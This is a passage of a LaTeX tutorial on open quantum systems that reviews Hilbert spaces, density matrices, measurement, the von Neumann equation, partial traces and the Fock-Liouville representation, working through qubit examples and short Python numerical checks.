\section{Mathematical basis}
\label{sec:math}
The primary mathematical tool in quantum mechanics is the theory of Hilbert spaces. This mathematical framework allows extending many results from finite linear vector spaces to infinite ones. In any case, this tutorial deals only with finite systems and, therefore, the expressions `Hilbert space' and `linear space' are equivalent. We assume that the reader is skilled in operating in Hilbert spaces. To deepen in the field of Hilbert spaces we recommend the book by Debnath and Mikusi\'nski \cite{debnath_05}. If the reader needs a brief review of the main concepts required for understanding this paper, we recommend Nielsen and Chuang's quantum computing book \cite{nielsen_00}. Some basic knowledge of infinitesimal calculus, such as integration, differentiation, and the resolution of simple differential equations, is also required. To help the reader, we have made a glossary of the most used mathematical terms. It can also be used as a checklist of terms the reader should be familiar with.
\vspace{0.25cm}
\noindent
{\bf Glossary:}
\begin{itemize}
\item ${\cal H}$ represents a Hilbert space, usually the space of pure states of a system.
\item $\ket{\psi}\in {\cal H}$ represents a vector of the Hilbert space ${\cal H}$ (a column vector).
\item $\bra{\psi}\in {\cal H}$ represents a vector of the dual Hilbert space of ${\cal H}$ (a row vector).
\item $\bracket{\psi}{\phi}\in \mathbb{C}$ is the scalar product of vectors $\ket{\psi}$ and $\ket{\phi}$.
\item $\norm{\ket{\psi}}$ is the norm of vector $\ket{\psi}$. $\norm{\ket{\psi}}\equiv\sqrt{\bracket{\psi}{\psi}}$.
\item $B({\cal H})$ represents the space of bounded operators acting on the Hilbert space $B:{\cal H} \to {\cal H}$.
\item $\mathbb 1_{{\cal H}}\in B({\cal H})$ is the Identity Operator of the Hilbert space ${\cal H}$ s.t. $\mathbb 1_{{\cal H}}\ket{\psi}=\ket{\psi},\; \; \forall \ket{\psi}\in {\cal H} $.
\item $\op{\psi}{\phi}\in B({\cal H})$ is the operator such that $\pare{\op{\psi}{\phi}} \ket{\varphi}=\bracket{\phi}{\varphi} \ket{\psi},\; \; \forall \ket{\varphi} \in {\cal H}$.
\item $O^\dagger\in B({\cal H})$ is the Hermitian conjugate of the operator $O\in B({\cal H})$.
\item $U\in B({\cal H})$ is a unitary operator iff $U U^{\dagger}=U^{\dagger}U=\mathbb 1$.
\item $H\in B({\cal H})$ is a Hermitian operator iff $H=H^{\dagger}$.
\item $A\in B({\cal H})$ is a positive operator $\pare{A> 0}$ iff $\bra{\phi} A \ket{\phi}\ge0,\;\; \forall \ket{\phi}\in {\cal H}$
\item $P\in B({\cal H})$ is a proyector iff $P P=P$.
\item $\textrm{Tr}\cor{B}$ represents the trace of operator $B$.
\item $\rho\pare{{\cal H}}$ represents the space of density matrices, meaning the space of bounded operators acting on ${\cal H}$ that are positive and have trace $1$.
\item $\kket{\rho}$ is a vector in the Fock-Liouville space.
\item $\bbracket{A}{B}=\textrm{Tr}\cor{A^\dagger B}$ is the scalar product of operators $A,B\in B({\cal H})$ in the Fock-Liouville space.
\item $\tilde{{\cal L}}$ is the matrix representation of a superoperator in the Fock-Liouville space.
\end{itemize}
\section{(Very short) Introduction to quantum mechanics}
\label{sec:qm}
The purpose of this chapter is to refresh the main concepts of quantum mechanics necessary to understand the Lindblad Master Equation. Of course, this is NOT a full quantum mechanics course. If a reader has no background in this field, just reading this chapter would be insufficient to understand the remaining of this tutorial. Therefore, if the reader is unsure of his/her capacities, we recommend to go first through a quantum mechanics course or to read an introductory book carefully. There are many great quantum mechanics books in the market. For beginners, we recommend Sakurai's book \cite{sakurai_94} or Nielsen and Chuang's Quantum Computing book \cite{nielsen_00}. For more advanced students, looking for a solid mathematical description of quantum mechanics methods, we recommend Galindo and Pascual \cite{galindo_pascual_90}. Finally, for a more philosophical discussion, you should go to Peres' book \cite{peres_95}.
We start stating the quantum mechanics postulates that we need to understand the derivation and application of the Lindblad Master Equation. The first postulate is related to the concept of a quantum state.
\vspace{0.5cm}
\begin{postulate}
Associated to any isolated physical system, there is a complex Hilbert space ${\cal H}$, known as the {\bf state space} of the system. The state of the system is entirely described by a {\it state vector}, which is a unit vector of the Hilbert space $(\ket{\psi}\in {\cal H})$.
\end{postulate}
\vspace{0.5cm}
\noindent
As quantum mechanics is a general theory (or a set of theories), it does not tell us which is the proper Hilbert space for each system. This is usually determined system by system. A natural question to ask is whether there is a one-to-one correspondence between unit vectors and physical states, meaning whether every unit vector corresponds to a possible physical state. This is resolved by the following corollary, which is a primary ingredient of quantum computation theory (see Ref. \cite{nielsen_00}, Chapter 7).
\vspace{0.5cm}
\begin{corollary}
All unit vectors of a finite Hilbert space correspond to possible physical states of a system.
\end{corollary}
\vspace{0.5cm}
\noindent
Unit vectors are also called {\it pure states}. If we know the pure state of a system, we have all physical information about it, and we can calculate the probabilistic outcomes of any potential measurement (see the next postulate). This is a very improbable situation as experimental settings are not perfect, and in most cases, we have only imperfect information about the state. Most generally, we may know that a quantum system can be in one state of a set $\key{\ket{\psi_i}}$ with probabilities $p_i$. Therefore, our knowledge of the system is given by an {\it ensemble of pure states} described by the set $\key{\ket{\psi_i}, \; p_i}$. If more than one $p_i$ is different from zero the state is not pure anymore, and it is called a {\it mixed state}. The mathematical tool that describes our knowledge of the system, in this case, is the {\it density operator} (or {\it density matrix}).
\begin{equation}
\rho \equiv \sum_i p_i \op{\psi_i}{\psi_i}.
\label{eq:dm}
\end{equation}
Density matrices are bounded operators that fulfil two mathematical conditions
\begin{enumerate}
\item A density matrix $\rho$ has unit trace $\pare{\textrm{Tr}[\rho]=1 }$.
\item A density matrix is a positive matrix $\rho>0$.
\end{enumerate}
Any operator fulfilling these two properties is considered a density operator. It can be proved trivially that density matrices are also Hermitian.
If we are given a density matrix, it is easy to verify whether it corresponds to a pure or a mixed state. For pure states, and only for them, $\textrm{Tr}[\rho^2]=\textrm{Tr}[\rho]=1$. Therefore, if $\textrm{Tr}[\rho^2]<1$ the state is mixed. The quantity $\textrm{Tr}[\rho^2]$ is called the purity of the state, and it fulfils the bounds $\frac{1}{d} \le \textrm{Tr}[\rho^2] \le 1$, being $d$ the dimension of the Hilbert space.
If we fix an arbitrary basis $\key{\ket{i}}_{i=1}^N$ of the Hilbert space the density matrix in this basis is written as $\rho=\sum_{i,j=1}^N \rho_{i,j} \op{i}{j}$, or
\begin{equation}
\rho=
\begin{pmatrix}
\rho_{00} & \rho_{01} & \cdots & \rho_{0N} \\
\rho_{10} & \rho_{11} & \cdots & \rho_{1N} \\
\vdots & \vdots & \ddots & \vdots \\
\rho_{N0} & \rho_{N1} & \cdots & \rho_{NN}
\end{pmatrix},
\end{equation}
where the diagonal elements are called {\it populations} $\pare{\rho_{ii}\in\mathbb{R}_0^+\text{ and } \sum_{i} \rho_{i,i}=1}$, while the off-diagonal elements are called {\it coherences} $\pare{ \rho^{\phantom{*}}_{i,j} \in \mathbb{C} \text{ and } \rho^{\phantom{*}}_{i,j}=\rho_{j,i}^*}$. Note that this notation is basis-dependent.
\begin{center}
\vspace{0.5cm}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 1. State of a two-level system (qubit)}
\vspace{0.25cm}
The Hilbert space of a two-level system is just the two-dimension lineal space ${\cal H}_2$. Examples of this kind of system are $\frac{1}{2}$-spins and two-level atoms. We can define a basis of it by the orthonormal vectors: $\key{ \ket{0},\;\ket{1}}$. A pure state of the system would be any unit vector of ${\cal H}_2$. It can always be expressed as a $\ket{\psi}=a\ket{0} + b\ket {1}$ with $a,b \in \mathbb{C}$ s. t. $\abs{a}^2 + \abs{b}^2=1$.
\vspace{0.25cm}
A mixed state is therefore represented by a positive unit trace operator $ \rho\in O({\cal H}_2)$.
\begin{equation}
\rho =
\begin{pmatrix}
\rho_{00} & \rho_{01} \\
\rho_{10} & \rho_{11}
\end{pmatrix}
= \rho_{00} \proj{0} + \rho_{01} \op{0}{1} + \rho_{10} \op{1}{0} + \rho_{11} \proj{1},
\label{eq:denmat}
\end{equation}
and it should fulfil $\rho_{00}+\rho_{11}=1$ and $\rho_{01}^{\phantom{*}}=\rho_{10}^*$.
\vspace{0.25cm}
\end{minipage}
\label{minipage1}
}
\end{center}
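As a quick numerical illustration of these properties (a short Python sketch, independent of the Mathematica notebooks of \cite{notebook}), one can verify the unit trace, positivity, and purity bounds for a pure qubit state and for the maximally mixed state:

```python
import numpy as np

# Check the defining properties of a qubit density matrix, and compare the
# purity Tr[rho^2] of a pure state with that of the maximally mixed state.

ket0 = np.array([1, 0], dtype=complex)
ket1 = np.array([0, 1], dtype=complex)

# pure state |psi> = (|0> + |1>)/sqrt(2)
psi = (ket0 + ket1) / np.sqrt(2)
rho_pure = np.outer(psi, psi.conj())

# maximally mixed state rho = 1/2
rho_mixed = 0.5 * np.eye(2, dtype=complex)

for rho in (rho_pure, rho_mixed):
    assert np.isclose(np.trace(rho).real, 1.0)        # unit trace
    assert np.all(np.linalg.eigvalsh(rho) >= -1e-12)  # positivity

purity_pure = np.trace(rho_pure @ rho_pure).real      # = 1 (pure state)
purity_mixed = np.trace(rho_mixed @ rho_mixed).real   # = 1/2 = 1/d
```

The mixed state saturates the lower bound $\frac{1}{d}$ of the purity, as expected for the maximally mixed state of a two-dimensional Hilbert space.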
\vspace{0.5cm}
\noindent
Once we know the state of a system, it is natural to ask about the possible outcomes of experiments (see Ref. \cite{sakurai_94}, Section 1.4).
\vspace{0.5cm}
\begin{postulate}
All possible measurements in a quantum system are described by a Hermitian operator or {\bf observable}. Due to the Spectral Theorem we know that any observable $O$ has a spectral decomposition in the form\footnote{For simplicity, we assume a non-degenerated spectrum.}
\begin{equation}
O=\sum_i a_i \op{a_i}{a_i},
\end{equation}
being $a_i\in\mathbb{R}$ the eigenvalues of the observable and $\ket{a_i}$ their corresponding eigenvectors. The probability of obtaining the result $a_i$ when measuring the property described by observable $O$ in a state $\ket{\psi}$ is given by
\begin{equation}
P(a_i)= \left| \bracket{\psi}{a_i} \right|^2.
\end{equation}
After the measurement we obtain the state $\ket{a_i}$ if the outcome $a_i$ was measured. This is called the {\it post-measurement state}.
\label{post4}
\end{postulate}
\vspace{0.5cm}
This postulate allows us to calculate the possible outcomes of a measurement, their probabilities, as well as the post-measurement state. A measurement usually changes the state, as it can only remain unchanged if it was already in an eigenstate of the observable.
It is possible to calculate the expectation value of the outcome of a measurement defined by operator $O$ in a state $\ket{\psi}$ by just applying the simple formula
\begin{equation}
\mean{O}= \bra{\psi} O \ket{\psi}.
\end{equation}
With a little algebra we can translate this postulate to mixed states. In this case, the probability of obtaining an output $a_i$ that corresponds to an eigenvector $\ket{a_i}$ is
\begin{equation}
P(a_i)=\textrm{Tr}\cor{\proj{a_i}\rho},
\end{equation}
and the expectation value of operator $O$ is
\begin{equation}
\mean{O}=\textrm{Tr} \cor{O\rho}.
\end{equation}
\begin{center}
\vspace{0.5cm}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 2. Measurement in a two-level system.}
\vspace{0.25cm}
A possible test to perform in our minimal model is to measure the energetic state of a system, assuming that both states have a different energy. The observable corresponding to this measurement would be
\begin{equation}
H=E_0 \proj{0} + E_1 \proj{1}.
\end{equation}
This operator has two eigenvalues $\key{E_0,\;E_1}$ with two corresponding eigenvectors $\key{\ket{0},\; \ket{1}}$.
\vspace{0.25cm}
If we have a pure state $\ket{\psi}=a\ket{0} + b \ket{1}$, the probability of measuring the energy $E_0$ would be $P(E_0)=\abs{\bracket{0}{\psi}}^2=\abs{a}^2$. The probability of finding $E_1$ would be $P(E_1)=\abs{\bracket{1}{\psi}}^2=\abs{b}^2$. The expected value of the measurement is $\mean{H}= E_0\abs{a}^2+ E_1\abs{b}^2$.
\vspace{0.25cm}
In the more general case of having a mixed state $\rho=\rho_{00} \proj{0} + \rho_{01} \op{0}{1} + \rho_{10} \op{1}{0} + \rho_{11} \proj{1}$, the probability of finding the ground state energy is $P(E_0)=\textrm{Tr} \cor{ \proj{0} \rho }= \rho_{00}$, and the expected value of the energy would be $\mean{H}=\textrm{Tr} \cor{H\rho}= E_0 \rho_{00} + E_1 \rho_{11}$.
\vspace{0.25cm}
\end{minipage}
\label{minipage2}
}
\end{center}
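These measurement formulas are easy to check numerically. The sketch below (Python, not part of \cite{notebook}; the populations and coherences are illustrative numbers) evaluates $P(E_0)=\textrm{Tr}\cor{\proj{0}\rho}$ and $\mean{H}=\textrm{Tr}\cor{H\rho}$ for a valid mixed state:

```python
import numpy as np

# Measurement statistics of Box 2: P(E_i) = Tr[|i><i| rho], <H> = Tr[H rho].
E0, E1 = 0.0, 1.0
H = np.diag([E0, E1]).astype(complex)

# an illustrative mixed state (unit trace, positive: det = 0.17 > 0)
rho = np.array([[0.7, 0.2],
                [0.2, 0.3]], dtype=complex)

P0 = np.trace(np.diag([1, 0]) @ rho).real   # = rho_00 = 0.7
mean_H = np.trace(H @ rho).real             # = E0*0.7 + E1*0.3 = 0.3
```

Note that the coherences of $\rho$ do not enter these particular expectation values, since $H$ is diagonal in the chosen basis.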
\vspace{0.5cm}
\noindent
Another natural question to ask is how quantum systems evolve. The time-evolution of a pure state of a closed quantum system is given by the Schr\"odinger equation (see \cite{galindo_pascual_90}, Section 2.9).
\vspace{0.5cm}
\begin{postulate}
Time evolution of a pure state of a closed quantum system is given by the Schr\"odinger equation
\begin{equation}
\frac{d}{dt} \ket{\psi(t)} = -\frac{i}{\hbar} H\ket{\psi(t)},
\label{eq:sch}
\end{equation}
where $H$ is the {\it Hamiltonian} of the system and it is a Hermitian operator of the Hilbert space of the system state (from now on we avoid including Planck's constant by selecting the units such that $\hbar=1)$.
\label{post3}
\end{postulate}
\vspace{0.5cm}
\noindent
The Hamiltonian of a system is the operator corresponding to its energy, and it can be non-trivial to realise.
Schr\"odinger equation can be formally solved in the following way. If at $t=0$ the state of a system is given by $\ket{\psi(0)}$ at time $t$ it will be
\begin{equation}
\ket{\psi(t)}=e^{-i Ht } \ket{\psi(0)}.
\end{equation}
As $H$ is a Hermitian operator, the operator $U=e^{-i Ht }$ is unitary. This gives us another way of phrasing Postulate \ref{post3}.
\vspace{0.5cm}
{\bf Postulate 3'}
{\it The evolution of a closed system is given by a unitary operator of the Hilbert space of the system }
\begin{equation}
\ket{\psi(t)}=U \ket{\psi(0)},
\label{eq:evol}
\end{equation}
{\it with} $U\in {\cal B}\pare{{\cal H}}$ {\it s.t.} $U U^{\dagger}=U^{\dagger}U=\mathbb 1$.
\vspace{0.5cm}
\noindent
It is easy to prove that unitary operators preserve the norm of vectors and, therefore, transform pure states into pure states. As we did with the state of a system, it is reasonable to wonder if any unitary operator corresponds to the evolution of a real physical system. The answer is yes.
\vspace{0.5cm}
\begin{lemma}
All unitary evolutions of a state belonging to a finite Hilbert space can be implemented in several physical realisations, such as photons and cold atoms.
\end{lemma}
\noindent
The proof of this lemma can be found at \cite{nielsen_00}.
The time evolution of a mixed state can be calculated just by combining Eqs. (\ref{eq:sch}) and (\ref{eq:dm}), giving the von-Neumann equation.
\begin{equation}
\dot{\rho} = - i \cor{H,\rho}\equiv {\cal L} \rho,
\label{eq:vne}
\end{equation}
where we have used the commutator $\cor{A,B}=AB-BA$, and ${\cal L}$ is the so-called Liouvillian superoperator.
It is easy to prove that the Hamiltonian dynamics does not change the purity of a system
\begin{equation}
\frac{d}{dt} \textrm{Tr}\cor{\rho^2} = \textrm{Tr}\cor{ \frac{d \rho^2}{dt} } = \textrm{Tr}\cor{ 2\rho \dot{\rho} } = -2 i \textrm{Tr}\cor{ \rho\pare{ H\rho -\rho H } }=0,
\end{equation}
where we have used the cyclic property of the trace. This result illustrates that the degree of mixture of a state does not change under the coherent quantum evolution.
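This invariance is straightforward to verify numerically. The following Python sketch (independent of \cite{notebook}; the Hamiltonian, the initial mixed state, and the evolution time are arbitrary illustrative choices) builds $U=e^{-iHt}$ from the spectral decomposition of $H$ and checks that $\textrm{Tr}\cor{\rho^2}$ is conserved:

```python
import numpy as np

# Unitary evolution rho(t) = U rho(0) U^dagger preserves the purity Tr[rho^2].
H = np.array([[1.0, 0.5],
              [0.5, -1.0]], dtype=complex)               # any Hermitian H
E, V = np.linalg.eigh(H)                                 # spectral decomposition

rho0 = np.array([[0.8, 0.1],
                 [0.1, 0.2]], dtype=complex)             # an illustrative mixed state
t = 2.7
U = V @ np.diag(np.exp(-1j * E * t)) @ V.conj().T        # U = exp(-i H t)

rho_t = U @ rho0 @ U.conj().T
purity_0 = np.trace(rho0 @ rho0).real
purity_t = np.trace(rho_t @ rho_t).real                  # equal to purity_0
```

The populations and coherences of $\rho$ do change in time, but the purity stays fixed; only non-unitary dynamics, such as the Lindblad evolution discussed later, can change it.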
\begin{center}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 3. Time evolution of a two-level system.}
\vspace{0.25cm}
The evolution of our isolated two-level system is described by its Hamiltonian
\begin{equation}
H_{\text{free}}=E_0 \proj{0} + E_1 \proj{1},
\label{eq:atomham}
\end{equation}
As the states $\ket{0}$ and $\ket{1}$ are Hamiltonian eigenstates, if at $t=0$ the atom is in the excited state $\ket{\psi(0)}=\ket{1}$, after a time $t$ the state would be $\ket{\psi(t)}=e^{-iHt} \ket{1}=e^{-i E_1 t} \ket{1}$.
\vspace{0.1cm}
As the system was already in an eigenvector of the Hamiltonian, its time-evolution consists only of adding a phase to the state, without changing its physical properties. (If an excited state does not change, why do atoms decay?) Without loss of generality we can fix the energy of the ground state as zero, obtaining
\begin{equation}
H_{\text{free}}= E \proj{1},
\label{eq:atomham2}
\end{equation}
with $E\equiv E_1$. To make the model more interesting we can include a driving that coherently switches between both states. The total Hamiltonian would be then
\begin{equation}
H=E \proj{1} + \Omega \pare{\op{0}{1} +\op{1}{0}},
\end{equation}
where $\Omega$ is the frequency of driving. By using the von-Neumann equation (\ref{eq:vne}) we can calculate the populations $\pare{\rho_{00},\rho_{11}}$ as a function of time. The system is then driven between the states, and the populations present Rabi oscillations, as it is shown in Fig. \ref{figure1}.
\begin{center}
\includegraphics[scale=.8]{figure1}
\captionof{figure}{Population dynamics under a quantum dynamics (Parameters are $\Omega=1,\; E=1$). The blue line represents $\rho_{11}$ and the orange one $\rho_{00}$.}
\label{figure1}
\end{center}
\end{minipage}
}\end{center}
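The Rabi oscillations of the figure in Box 3 can be reproduced with a few lines of numerical integration. The sketch below (Python, independent of the Mathematica notebooks \cite{notebook}) integrates the von Neumann equation with a fourth-order Runge-Kutta scheme for the driven Hamiltonian with $\Omega=E=1$, starting from the excited state:

```python
import numpy as np

# Integrate rho' = -i[H, rho] for H = E|1><1| + Omega(|0><1| + |1><0|),
# starting from rho(0) = |1><1|, and track the excited-state population.
E, Omega = 1.0, 1.0
H = np.array([[0, Omega],
              [Omega, E]], dtype=complex)          # basis ordering {|0>, |1>}

def vn(r):
    return -1j * (H @ r - r @ H)                   # von Neumann right-hand side

rho = np.array([[0, 0],
                [0, 1]], dtype=complex)            # rho(0) = |1><1|
dt, steps = 1e-3, 10_000                           # integrate up to t = 10

pop1_min = 1.0
for _ in range(steps):
    k1 = vn(rho)                                   # 4th-order Runge-Kutta step
    k2 = vn(rho + 0.5 * dt * k1)
    k3 = vn(rho + 0.5 * dt * k2)
    k4 = vn(rho + dt * k3)
    rho += dt / 6 * (k1 + 2 * k2 + 2 * k3 + k4)
    pop1_min = min(pop1_min, rho[1, 1].real)

trace_final = np.trace(rho).real                   # trace is conserved
```

For these parameters the population $\rho_{11}$ oscillates between $1$ and $1-\Omega^2/\pare{\Omega^2+E^2/4}=0.2$, in agreement with the standard detuned-Rabi formula, and the trace stays equal to one since the commutator is traceless.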
\vspace{0.5cm}
\noindent
Finally, as we are interested in composite quantum systems, we need to postulate how to work with them.
\vspace{0.5cm}
\begin{postulate}
The state-space of a composite physical system, composed by $N$ subsystems, is the tensor product of the state space of each component
${\cal H}={\cal H}_1 \otimes {\cal H}_2 \otimes \cdots \otimes {\cal H}_N$. The state of the composite physical system is given by a unit vector of ${\cal H}$. Moreover, if each subsystem belonging to ${\cal H}_i$ is prepared in the state $\ket{\psi_i}$ the total state is given by $\ket{\psi}=\ket{\psi_1} \otimes \ket{\psi_2} \otimes \cdots \otimes\ket{\psi_N}$.
\end{postulate}
\vspace{0.5cm}
\noindent
The symbol $\otimes$ represents the tensor product of Hilbert spaces, vectors, and operators. If we have a composited mixed state where each component is prepared in the state $\rho_i$ the total state is given by $\rho=\rho_1 \otimes \rho_2 \otimes \cdots \otimes\rho_N$.
States that can be expressed in the simple form $\ket{\psi}=\ket{\psi_1} \otimes \ket{\psi_2}$, in any specific basis, are very particular, and they are called {\it separable states}. (For this discussion, we use a bipartite system as an example; the extension to a general multipartite system is straightforward.) In general, an arbitrary state should be described as $\ket{\psi}=\sum_{i,j} c_{ij}\ket{\psi_i} \otimes \ket{\phi_j}$ (or $\rho=\sum_{i,j} p_{ij}\, \rho_i \otimes \rho_j$ for mixed states). Non-separable states are called {\it entangled states}.
Now that we know how to compose systems, we can be interested in going the other way around. If we have a system belonging to a bipartite Hilbert space of the form ${\cal H}={\cal H}_a \otimes {\cal H}_b$, we may be interested in studying some properties of the subsystem corresponding to one of the subspaces. To do so, we define the {\it reduced density matrix}. If the state of our system is described by a density matrix $\rho$, the reduced density operator of subsystem $a$ is defined by the operator
\begin{equation}
\rho_{a} \equiv \textrm{Tr}_{b} \cor{\rho},
\end{equation}
where $\textrm{Tr}_b$ is the partial trace over subspace $b$, defined as \cite{nielsen_00}
\begin{equation}
\textrm{Tr}_b \cor{ \sum_{i,j,k,l} \op{a_i}{a_j} \otimes \op{b_k}{b_l} } \equiv\sum_{i,j} \op{a_i}{a_j} \textrm{Tr} \cor{ \sum_{k,l} \op{b_k}{b_l}}.
\end{equation}
The concepts of reduced density matrix and partial trace are essential in the study of open quantum systems. If we want to calculate the equation of motions of a system affected by an environment, we should trace out this environment and deal only with the reduced density matrix of the system. This is the main idea of the theory of open quantum systems.
\newpage
\begin{center}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 4. Two two-level atoms}
\vspace{0.25cm}
If we have two two-level systems, the total Hilbert space is given by ${\cal H}={\cal H}_2\otimes {\cal H}_2$. A basis of this Hilbert space would be given by the set $\left\{ \ket{00}\equiv \ket{0}_1 \otimes\ket{0}_2,\; \ket{01}\equiv \ket{0}_1 \otimes\ket{1}_2,\; \ket{10}\equiv \ket{1}_1 \otimes\ket{0}_2,\;\ket{11}\equiv \ket{1}_1 \otimes\ket{1}_2 \right\}$. If both systems are in their ground state, we can describe the total state by the separable vector
\begin{equation}
\ket{\psi}_G=\ket{00}.
\end{equation}
A more complex, but still separable, state can be formed if both systems are in superposition.
\begin{eqnarray}
\ket{\psi}_S&=&\frac{1}{\sqrt{2}} \left( \ket{0}_1 +\ket{1}_1 \right) \otimes \frac{1}{ \sqrt{2}} \left( \ket{0}_2 +\ket{1}_2 \right) \nonumber\\
&=& \frac{1}{2} \left( \ket{00} + \ket{10} + \ket{01} + \ket{11} \right)
\end{eqnarray}
An entangled state would be
\begin{equation}
\ket{\psi}_E=\frac{1}{ \sqrt{2}} \left( \ket{00} +\ket{11} \right).
\end{equation}
This state cannot be separated into a direct product of each subsystem. If we want to obtain a reduced description of subsystem $1$ (or $2$) we have to use the partial trace. To do so, we need first to calculate the density matrix corresponding to the pure state $\ket{\psi}_E$.
\begin{equation}
\rho_E=\ket{\psi}\bra{\psi}_E = \frac{1}{2} \left( \proj{00} + \op{00}{11} + \op{11}{00} + \proj{11} \right).
\end{equation}
We can now calculate the reduced density matrix of the subsystem $1$ by using the partial trace.
\begin{equation}
\rho_E^{(1)}= \bra{0}_2 \rho_E \ket{0}_2 + \bra{1}_2 \rho_E \ket{1}_2 = \frac{1}{2} \left( \proj{0}_1 + \proj{1}_1 \right).
\end{equation}
From this reduced density matrix, we can calculate all the measurement statistics of subsystem $1$.
\vspace{0.25cm}
\end{minipage}
}
\end{center}
\vspace{0.5cm}
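The partial trace of Box 4 can also be computed numerically. In the sketch below (Python, independent of \cite{notebook}), the $4\times 4$ density matrix is reshaped into a four-index tensor so that tracing over the second subsystem becomes a single index contraction:

```python
import numpy as np

# Partial trace of the entangled state |psi>_E = (|00> + |11>)/sqrt(2):
# the reduced state of subsystem 1 is the maximally mixed state 1/2.
psi = np.zeros(4, dtype=complex)
psi[0] = psi[3] = 1 / np.sqrt(2)        # basis ordering {|00>, |01>, |10>, |11>}
rho_E = np.outer(psi, psi.conj())

# reshape to indices (i, k, j, l), with i, j labelling subsystem 1 and
# k, l labelling subsystem 2, then contract k with l (the partial trace)
rho1 = np.einsum('ikjk->ij', rho_E.reshape(2, 2, 2, 2))
```

The result is $\rho_E^{(1)}=\mathbb 1/2$: although the global state is pure, the reduced state of either subsystem is maximally mixed, which is a hallmark of entanglement.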
\newpage
\section{The Fock-Liouville Hilbert space. The Liouville superoperator}
\label{sec:fl}
In this section, we revise a useful framework for both analytical and numerical calculations. It is clear that some linear combinations of density matrices are valid density matrices (as long as they preserve positivity and unit trace). Because of that, we can create a Hilbert space of density matrices just by defining a scalar product. This is immediate for finite systems, since in this case a scalar-product space is automatically a Hilbert space, and it also happens to be true for infinite spaces. This allows us to define a linear space of matrices, converting the matrices effectively into vectors ($\rho\to\kket{\rho}$). This is called the Fock-Liouville space (FLS). The usual definition of the scalar product of matrices $\phi$ and $\rho$ is $\bbracket{\phi}{\rho}\equiv\textrm{Tr}\cor{\phi^\dagger\rho}$. The Liouville superoperator from Eq. (\ref{eq:vne}) is now an operator acting on the Hilbert space of density matrices. The main utility of the FLS is to allow a matrix representation of the evolution operator.
\vspace{0.5cm}
\begin{center}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 5. Time evolution of a two-level system.}
\vspace{0.25cm}
The density matrix of our system (\ref{eq:denmat}) can be expressed in the FLS as
\begin{equation}
\kket{\rho}=
\begin{pmatrix}
\rho_{00} \\
\rho_{01} \\
\rho_{10} \\
\rho_{11}
\end{pmatrix}.
\end{equation}
\vspace{0.25cm}
The time evolution of a mixed state is given by the von-Neumann equation (\ref{eq:vne}). The Liouvillian superoperator can now be expressed as a matrix
\begin{equation}
\tilde{{\cal L}}=
\left(
\begin{array}{cccc}
0 & i \Omega & -i\Omega & 0 \\
i\Omega & i E &0 & -i\Omega \\
-i\Omega & 0 & -iE & i\Omega \\
0 & -i\Omega & i\Omega & 0
\end{array}
\right),
\end{equation}
where each row is calculated just by observing the output of the operation $-i \cor{H,\rho}$ in the computational basis of the density matrices space. The time evolution of the system now corresponds to the matrix equation $\frac{d \kket{\rho}}{dt}=\tilde{{\cal L}} \kket{\rho}$, that in matrix notation would be
\begin{equation}
\begin{pmatrix}
\dot{\rho}_{00} \\
\dot{\rho}_{01} \\
\dot{\rho}_{10} \\
\dot{\rho}_{11}
\end{pmatrix}
=
\left(
\begin{array}{cccc}
0 & i \Omega & -i\Omega & 0 \\
i\Omega & i E &0 & -i\Omega \\
-i\Omega & 0 & -i E & i\Omega \\
0 & -i\Omega & i\Omega & 0
\end{array}
\right)
\begin{pmatrix}
\rho_{00} \\
\rho_{01} \\
\rho_{10} \\
\rho_{11}
\end{pmatrix}
\end{equation}
\vspace{0.25cm}
\label{minipage4}
\end{minipage}
}
\end{center}
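The matrix $\tilde{{\cal L}}$ of Box 5 can be generated automatically by vectorisation. For the row-major ordering $\kket{\rho}=(\rho_{00},\rho_{01},\rho_{10},\rho_{11})^T$ one has the identity $\text{vec}(AXB)=(A\otimes B^T)\,\text{vec}(X)$, so that $-i\cor{H,\rho}$ becomes $-i\pare{H\otimes\mathbb 1 - \mathbb 1\otimes H^T}\kket{\rho}$. The Python sketch below (independent of \cite{notebook}) builds this matrix and checks it against both the explicit Box 5 result and the direct commutator:

```python
import numpy as np

# Matrix representation of L(rho) = -i[H, rho] in the Fock-Liouville space,
# using row-major vectorisation |rho>> = (rho00, rho01, rho10, rho11)^T and
# the identity vec(A X B) = (A kron B^T) vec(X).
E, Omega = 1.0, 1.0
H = np.array([[0, Omega],
              [Omega, E]], dtype=complex)
I2 = np.eye(2)

L = -1j * (np.kron(H, I2) - np.kron(I2, H.T))

# explicit 4x4 matrix quoted in Box 5
L_box5 = np.array([[0,         1j*Omega, -1j*Omega, 0],
                   [1j*Omega,  1j*E,      0,       -1j*Omega],
                   [-1j*Omega, 0,        -1j*E,     1j*Omega],
                   [0,        -1j*Omega,  1j*Omega, 0]])

# check the action on an arbitrary density matrix
rho = np.array([[0.6, 0.2 - 0.1j],
                [0.2 + 0.1j, 0.4]])
lhs = (L @ rho.reshape(4)).reshape(2, 2)    # superoperator acting on |rho>>
rhs = -1j * (H @ rho - rho @ H)             # direct commutator
```

This vectorised construction is what makes numerical spectral analysis of Liouvillians (eigenvalues, steady states) straightforward in practice.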
\vspace{0.5cm}
\newpage
\section{CPT-maps and the Lindblad Master Equation.}
\label{cpt}
\subsection{Completely positive maps}
The problem we want to study is to find the most general Markovian transformation set between density matrices. Until now, we have seen that quantum systems can evolve in two ways: by a coherent evolution (Postulate \ref{post3}) and by collapsing after a measurement (Postulate \ref{post4}). Many efforts have been made to unify these two ways of evolving \cite{schlosshauer_07}, without a definite answer so far. It is reasonable to ask what is the most general transformation that can be performed on a quantum system, and what is the dynamical equation that describes this transformation.
We are looking for maps that transform density matrices into density matrices. We define $\rho({\cal H})$ as the space of all density matrices in the Hilbert space ${\cal H}$. Therefore, we are looking for a map of this space onto itself, ${\cal V}:\rho({\cal H})\to\rho({\cal H})$. To ensure that the output of the map is a density matrix, it should fulfil the following properties
\begin{itemize}
\item Trace preserving. $\textrm{Tr}\cor{{\cal V} A}=\textrm{Tr}\cor{A},$ $\forall A\in O({\cal H})$.
\item Completely positive (see below).
\end{itemize}
Any map that fulfils these two properties is called a {\it completely positive and trace-preserving map (CPT-map)}. The first property is quite apparent, and it does not require more thinking. The second one is a little more complicated, and it requires an intermediate definition.
